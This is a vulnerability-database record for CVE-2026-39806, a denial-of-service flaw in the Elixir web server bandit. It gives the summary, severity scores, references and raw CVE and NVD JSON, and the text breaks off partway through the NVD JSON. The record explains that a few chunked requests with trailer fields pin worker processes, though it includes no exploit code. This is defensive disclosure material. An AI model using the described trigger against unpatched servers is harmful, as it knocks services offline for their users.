Vulnerability-Lookup

CVE-2026-39806 (GCVE-0-2026-39806)

Vulnerability from cvelistv5 – Published: 2026-05-13 13:36 – Updated: 2026-05-13 18:27

Title

HTTP/1 chunked decoder infinite loop on requests with trailer fields in bandit

Summary

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in mtrudel bandit allows unauthenticated remote denial of service via worker process exhaustion. 'Elixir.Bandit.HTTP1.Socket':do_read_chunked_data!/5 in lib/bandit/http1/socket.ex terminates only when the last-chunk line 0\r\n is followed immediately by the empty trailer line \r\n. RFC 9112 §7.1.2 permits zero or more trailer fields between them. When trailers are present, none of the match clauses fit: the catch-all arm computes a negative to_read, calls read_available!/2, receives <<>> on timeout, and tail-recurses with unchanged state. The worker process is pinned for the lifetime of the TCP connection. A handful of concurrent connections sending RFC-conformant chunked requests with trailer fields is sufficient to exhaust the Bandit worker pool and render the server unresponsive to all further traffic. No authentication, special headers, or large payload is required. Proxies such as NGINX and HAProxy legitimately forward trailer-bearing requests, so servers behind such proxies may be affected without any malicious client involvement. This issue affects bandit: from 1.6.1 before 1.11.1.

Severity ?

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE

CWE-835 - Loop with Unreachable Exit Condition ('Infinite Loop')

Assigner

EEF

References

4 references

URL	Tags
https://github.com/mtrudel/bandit/security/adviso…	vendor-advisoryrelated
https://cna.erlef.org/cves/CVE-2026-39806.html	related
https://osv.dev/vulnerability/EEF-CVE-2026-39806	related
https://github.com/mtrudel/bandit/commit/ae3520df…	patch

Impacted products

2 products

Vendor	Product	Version
mtrudel	bandit	Affected: 1.6.1 , < 1.11.1 (semver) cpe:2.3:a:mtrudel:bandit::::::::
mtrudel	bandit	Affected: e73e379ab59840e8561b5730878f16e29ab06217 , < ae3520dfdbfab115c638f8c7f6f6b805db34e1ab (git) cpe:2.3:a:mtrudel:bandit::::::::

Credits

Peter Ullrich Mat Trudel Jonatan Männchen

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-39806",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-13T14:36:21.650529Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-13T14:36:34.475Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://repo.hex.pm",
          "cpes": [
            "cpe:2.3:a:mtrudel:bandit:*:*:*:*:*:*:*:*"
          ],
          "defaultStatus": "unaffected",
          "modules": [
            "\u0027Elixir.Bandit.HTTP1.Socket\u0027"
          ],
          "packageName": "bandit",
          "packageURL": "pkg:hex/bandit",
          "product": "bandit",
          "programFiles": [
            "lib/bandit/http1/socket.ex"
          ],
          "programRoutines": [
            {
              "name": "\u0027Elixir.Bandit.HTTP1.Socket\u0027:do_read_chunked_data!/5"
            }
          ],
          "repo": "https://github.com/mtrudel/bandit",
          "vendor": "mtrudel",
          "versions": [
            {
              "lessThan": "1.11.1",
              "status": "affected",
              "version": "1.6.1",
              "versionType": "semver"
            }
          ]
        },
        {
          "collectionURL": "https://github.com",
          "cpes": [
            "cpe:2.3:a:mtrudel:bandit:*:*:*:*:*:*:*:*"
          ],
          "defaultStatus": "unaffected",
          "modules": [
            "\u0027Elixir.Bandit.HTTP1.Socket\u0027"
          ],
          "packageName": "mtrudel/bandit",
          "packageURL": "pkg:github/mtrudel/bandit",
          "product": "bandit",
          "programFiles": [
            "lib/bandit/http1/socket.ex"
          ],
          "programRoutines": [
            {
              "name": "\u0027Elixir.Bandit.HTTP1.Socket\u0027:do_read_chunked_data!/5"
            }
          ],
          "repo": "https://github.com/mtrudel/bandit",
          "vendor": "mtrudel",
          "versions": [
            {
              "lessThan": "ae3520dfdbfab115c638f8c7f6f6b805db34e1ab",
              "status": "affected",
              "version": "e73e379ab59840e8561b5730878f16e29ab06217",
              "versionType": "git"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:a:mtrudel:bandit:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "1.11.1",
                  "versionStartIncluding": "1.6.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ],
          "operator": "AND"
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Peter Ullrich"
        },
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Mat Trudel"
        },
        {
          "lang": "en",
          "type": "analyst",
          "value": "Jonatan M\u00e4nnchen"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027) vulnerability in mtrudel bandit allows unauthenticated remote denial of service via worker process exhaustion.\u003cp\u003e\u003ctt\u003e\u0027Elixir.Bandit.HTTP1.Socket\u0027:do_read_chunked_data!/5\u003c/tt\u003e in \u003ctt\u003elib/bandit/http1/socket.ex\u003c/tt\u003e terminates only when the last-chunk line \u003ctt\u003e0\\r\\n\u003c/tt\u003e is followed immediately by the empty trailer line \u003ctt\u003e\\r\\n\u003c/tt\u003e. RFC 9112 \u00a77.1.2 permits zero or more trailer fields between them. When trailers are present, none of the match clauses fit: the catch-all arm computes a negative \u003ctt\u003eto_read\u003c/tt\u003e, calls \u003ctt\u003eread_available!/2\u003c/tt\u003e, receives \u003ctt\u003e\u0026lt;\u0026lt;\u0026gt;\u0026gt;\u003c/tt\u003e on timeout, and tail-recurses with unchanged state. The worker process is pinned for the lifetime of the TCP connection.\u003c/p\u003e\u003cp\u003eA handful of concurrent connections sending RFC-conformant chunked requests with trailer fields is sufficient to exhaust the Bandit worker pool and render the server unresponsive to all further traffic. No authentication, special headers, or large payload is required. Proxies such as NGINX and HAProxy legitimately forward trailer-bearing requests, so servers behind such proxies may be affected without any malicious client involvement.\u003c/p\u003e\u003cp\u003eThis issue affects bandit: from 1.6.1 before 1.11.1.\u003c/p\u003e"
            }
          ],
          "value": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027) vulnerability in mtrudel bandit allows unauthenticated remote denial of service via worker process exhaustion.\n\n\u0027Elixir.Bandit.HTTP1.Socket\u0027:do_read_chunked_data!/5 in lib/bandit/http1/socket.ex terminates only when the last-chunk line 0\\r\\n is followed immediately by the empty trailer line \\r\\n. RFC 9112 \u00a77.1.2 permits zero or more trailer fields between them. When trailers are present, none of the match clauses fit: the catch-all arm computes a negative to_read, calls read_available!/2, receives \u003c\u003c\u003e\u003e on timeout, and tail-recurses with unchanged state. The worker process is pinned for the lifetime of the TCP connection.\n\nA handful of concurrent connections sending RFC-conformant chunked requests with trailer fields is sufficient to exhaust the Bandit worker pool and render the server unresponsive to all further traffic. No authentication, special headers, or large payload is required. Proxies such as NGINX and HAProxy legitimately forward trailer-bearing requests, so servers behind such proxies may be affected without any malicious client involvement.\n\nThis issue affects bandit: from 1.6.1 before 1.11.1."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-469",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-469 HTTP DoS"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-835",
              "description": "CWE-835 Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-13T18:27:37.964Z",
        "orgId": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
        "shortName": "EEF"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory",
            "related"
          ],
          "url": "https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf"
        },
        {
          "tags": [
            "related"
          ],
          "url": "https://cna.erlef.org/cves/CVE-2026-39806.html"
        },
        {
          "tags": [
            "related"
          ],
          "url": "https://osv.dev/vulnerability/EEF-CVE-2026-39806"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/mtrudel/bandit/commit/ae3520dfdbfab115c638f8c7f6f6b805db34e1ab"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "HTTP/1 chunked decoder infinite loop on requests with trailer fields in bandit",
      "x_generator": {
        "engine": "cvelib 1.8.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
    "assignerShortName": "EEF",
    "cveId": "CVE-2026-39806",
    "datePublished": "2026-05-13T13:36:17.806Z",
    "dateReserved": "2026-04-07T12:28:54.916Z",
    "dateUpdated": "2026-05-13T18:27:37.964Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-39806",
      "date": "2026-05-23",
      "epss": "0.01063",
      "percentile": "0.77915"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-39806\",\"sourceIdentifier\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"published\":\"2026-05-13T14:17:35.700\",\"lastModified\":\"2026-05-21T15:23:08.653\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027) vulnerability in mtrudel bandit allows unauthenticated remote denial of service via worker process exhaustion.\\n\\n\u0027Elixir.Bandit.HTTP1.Socket\u0027:do_read_chunked_data!/5 in lib/bandit/http1/socket.ex terminates only when the last-chunk line 0\\\\r\\\\n is followed immediately by the empty trailer line \\\\r\\\\n. RFC 9112 \u00a77.1.2 permits zero or more trailer fields between them. When trailers are present, none of the match clauses fit: the catch-all arm computes a negative to_read, calls read_available!/2, receives \u003c\u003c\u003e\u003e on timeout, and tail-recurses with unchanged state. The worker process is pinned for the lifetime of the TCP connection.\\n\\nA handful of concurrent connections sending RFC-conformant chunked requests with trailer fields is sufficient to exhaust the Bandit worker pool and render the server unresponsive to all further traffic. No authentication, special headers, or large payload is required. Proxies such as NGINX and HAProxy legitimately forward trailer-bearing requests, so servers behind such proxies may be affected without any malicious client involvement.\\n\\nThis issue affects bandit: from 1.6.1 before 1.11.1.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-835\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:mtrudel:bandit:*:*:*:*:*:*:*:*\",\"versionStartIncluding\":\"1.6.1\",\"versionEndExcluding\":\"1.11.1\",\"matchCriteriaId\":\"4C7F13C2-7993-4309-BCAE-8548A08F9D5E\"}]}]}],\"references\":[{\"url\":\"https://cna.erlef.org/cves/CVE-2026-39806.html\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/mtrudel/bandit/commit/ae3520dfdbfab115c638f8c7f6f6b805db34e1ab\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://osv.dev/vulnerability/EEF-CVE-2026-39806\",\"source\":\"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-39806\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-13T14:36:21.650529Z\"}}}], \"references\": [{\"url\": \"https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-13T14:35:57.553Z\"}}], \"cna\": {\"title\": \"HTTP/1 chunked decoder infinite loop on requests with trailer fields in bandit\", \"source\": {\"discovery\": \"EXTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Peter Ullrich\"}, {\"lang\": \"en\", \"type\": \"remediation developer\", \"value\": \"Mat Trudel\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Jonatan M\\u00e4nnchen\"}], \"impacts\": [{\"capecId\": \"CAPEC-469\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-469 HTTP DoS\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:mtrudel:bandit:*:*:*:*:*:*:*:*\"], \"repo\": \"https://github.com/mtrudel/bandit\", \"vendor\": \"mtrudel\", \"modules\": [\"\u0027Elixir.Bandit.HTTP1.Socket\u0027\"], \"product\": \"bandit\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.6.1\", \"lessThan\": \"1.11.1\", \"versionType\": \"semver\"}], \"packageURL\": \"pkg:hex/bandit\", \"packageName\": \"bandit\", \"programFiles\": [\"lib/bandit/http1/socket.ex\"], \"collectionURL\": \"https://repo.hex.pm\", \"defaultStatus\": \"unaffected\", \"programRoutines\": [{\"name\": \"\u0027Elixir.Bandit.HTTP1.Socket\u0027:do_read_chunked_data!/5\"}]}, {\"cpes\": [\"cpe:2.3:a:mtrudel:bandit:*:*:*:*:*:*:*:*\"], \"repo\": \"https://github.com/mtrudel/bandit\", \"vendor\": \"mtrudel\", \"modules\": [\"\u0027Elixir.Bandit.HTTP1.Socket\u0027\"], \"product\": \"bandit\", \"versions\": [{\"status\": \"affected\", \"version\": \"e73e379ab59840e8561b5730878f16e29ab06217\", \"lessThan\": \"ae3520dfdbfab115c638f8c7f6f6b805db34e1ab\", \"versionType\": \"git\"}], \"packageURL\": \"pkg:github/mtrudel/bandit\", \"packageName\": \"mtrudel/bandit\", \"programFiles\": [\"lib/bandit/http1/socket.ex\"], \"collectionURL\": \"https://github.com\", \"defaultStatus\": \"unaffected\", \"programRoutines\": [{\"name\": \"\u0027Elixir.Bandit.HTTP1.Socket\u0027:do_read_chunked_data!/5\"}]}], \"references\": [{\"url\": \"https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf\", \"tags\": [\"vendor-advisory\", \"related\"]}, {\"url\": \"https://cna.erlef.org/cves/CVE-2026-39806.html\", \"tags\": [\"related\"]}, {\"url\": \"https://osv.dev/vulnerability/EEF-CVE-2026-39806\", \"tags\": [\"related\"]}, {\"url\": \"https://github.com/mtrudel/bandit/commit/ae3520dfdbfab115c638f8c7f6f6b805db34e1ab\", \"tags\": [\"patch\"]}], \"x_generator\": {\"engine\": \"cvelib 1.8.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027) vulnerability in mtrudel bandit allows unauthenticated remote denial of service via worker process exhaustion.\\n\\n\u0027Elixir.Bandit.HTTP1.Socket\u0027:do_read_chunked_data!/5 in lib/bandit/http1/socket.ex terminates only when the last-chunk line 0\\\\r\\\\n is followed immediately by the empty trailer line \\\\r\\\\n. RFC 9112 \\u00a77.1.2 permits zero or more trailer fields between them. When trailers are present, none of the match clauses fit: the catch-all arm computes a negative to_read, calls read_available!/2, receives \u003c\u003c\u003e\u003e on timeout, and tail-recurses with unchanged state. The worker process is pinned for the lifetime of the TCP connection.\\n\\nA handful of concurrent connections sending RFC-conformant chunked requests with trailer fields is sufficient to exhaust the Bandit worker pool and render the server unresponsive to all further traffic. No authentication, special headers, or large payload is required. Proxies such as NGINX and HAProxy legitimately forward trailer-bearing requests, so servers behind such proxies may be affected without any malicious client involvement.\\n\\nThis issue affects bandit: from 1.6.1 before 1.11.1.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027) vulnerability in mtrudel bandit allows unauthenticated remote denial of service via worker process exhaustion.\u003cp\u003e\u003ctt\u003e\u0027Elixir.Bandit.HTTP1.Socket\u0027:do_read_chunked_data!/5\u003c/tt\u003e in \u003ctt\u003elib/bandit/http1/socket.ex\u003c/tt\u003e terminates only when the last-chunk line \u003ctt\u003e0\\\\r\\\\n\u003c/tt\u003e is followed immediately by the empty trailer line \u003ctt\u003e\\\\r\\\\n\u003c/tt\u003e. RFC 9112 \\u00a77.1.2 permits zero or more trailer fields between them. When trailers are present, none of the match clauses fit: the catch-all arm computes a negative \u003ctt\u003eto_read\u003c/tt\u003e, calls \u003ctt\u003eread_available!/2\u003c/tt\u003e, receives \u003ctt\u003e\u0026lt;\u0026lt;\u0026gt;\u0026gt;\u003c/tt\u003e on timeout, and tail-recurses with unchanged state. The worker process is pinned for the lifetime of the TCP connection.\u003c/p\u003e\u003cp\u003eA handful of concurrent connections sending RFC-conformant chunked requests with trailer fields is sufficient to exhaust the Bandit worker pool and render the server unresponsive to all further traffic. No authentication, special headers, or large payload is required. Proxies such as NGINX and HAProxy legitimately forward trailer-bearing requests, so servers behind such proxies may be affected without any malicious client involvement.\u003c/p\u003e\u003cp\u003eThis issue affects bandit: from 1.6.1 before 1.11.1.\u003c/p\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-835\", \"description\": \"CWE-835 Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)\"}]}], \"cpeApplicability\": [{\"nodes\": [{\"negate\": false, \"cpeMatch\": [{\"criteria\": \"cpe:2.3:a:mtrudel:bandit:*:*:*:*:*:*:*:*\", \"vulnerable\": true, \"versionEndExcluding\": \"1.11.1\", \"versionStartIncluding\": \"1.6.1\"}], \"operator\": \"OR\"}], \"operator\": \"AND\"}], \"providerMetadata\": {\"orgId\": \"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\", \"shortName\": \"EEF\", \"dateUpdated\": \"2026-05-13T18:27:37.964Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-39806\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-13T18:27:37.964Z\", \"dateReserved\": \"2026-04-07T12:28:54.916Z\", \"assignerOrgId\": \"6b3ad84c-e1a6-4bf7-a703-f496b71e49db\", \"datePublished\": \"2026-05-13T13:36:17.806Z\", \"assignerShortName\": \"EEF\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-39806

Vulnerability from fkie_nvd - Published: 2026-05-13 14:17 - Updated: 2026-05-21 15:23

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

References

URL	Tags
6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://cna.erlef.org/cves/CVE-2026-39806.html	Third Party Advisory
6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://github.com/mtrudel/bandit/commit/ae3520dfdbfab115c638f8c7f6f6b805db34e1ab	Patch
6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf	Exploit, Vendor Advisory
6b3ad84c-e1a6-4bf7-a703-f496b71e49db	https://osv.dev/vulnerability/EEF-CVE-2026-39806	Third Party Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/mtrudel/bandit/security/advisories/GHSA-rf5q-vwxw-gmrf	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	mtrudel	bandit	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:mtrudel:bandit:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "4C7F13C2-7993-4309-BCAE-8548A08F9D5E",
              "versionEndExcluding": "1.11.1",
              "versionStartIncluding": "1.6.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027) vulnerability in mtrudel bandit allows unauthenticated remote denial of service via worker process exhaustion.\n\n\u0027Elixir.Bandit.HTTP1.Socket\u0027:do_read_chunked_data!/5 in lib/bandit/http1/socket.ex terminates only when the last-chunk line 0\\r\\n is followed immediately by the empty trailer line \\r\\n. RFC 9112 \u00a77.1.2 permits zero or more trailer fields between them. When trailers are present, none of the match clauses fit: the catch-all arm computes a negative to_read, calls read_available!/2, receives \u003c\u003c\u003e\u003e on timeout, and tail-recurses with unchanged state. The worker process is pinned for the lifetime of the TCP connection.\n\nA handful of concurrent connections sending RFC-conformant chunked requests with trailer fields is sufficient to exhaust the Bandit worker pool and render the server unresponsive to all further traffic. No authentication, special headers, or large payload is required. Proxies such as NGINX and HAProxy legitimately forward trailer-bearing requests, so servers behind such proxies may be affected without any malicious client involvement.\n\nThis issue affects bandit: from 1.6.1 before 1.11.1."
    }
  ],
  "id": "CVE-2026-39806",
  "lastModified": "2026-05-21T15:23:08.653",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-13T14:17:35.700",
  "references": [
    {
      "source": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "https://cna.erlef.org/cves/CVE-2026-39806.html"
    },
    {
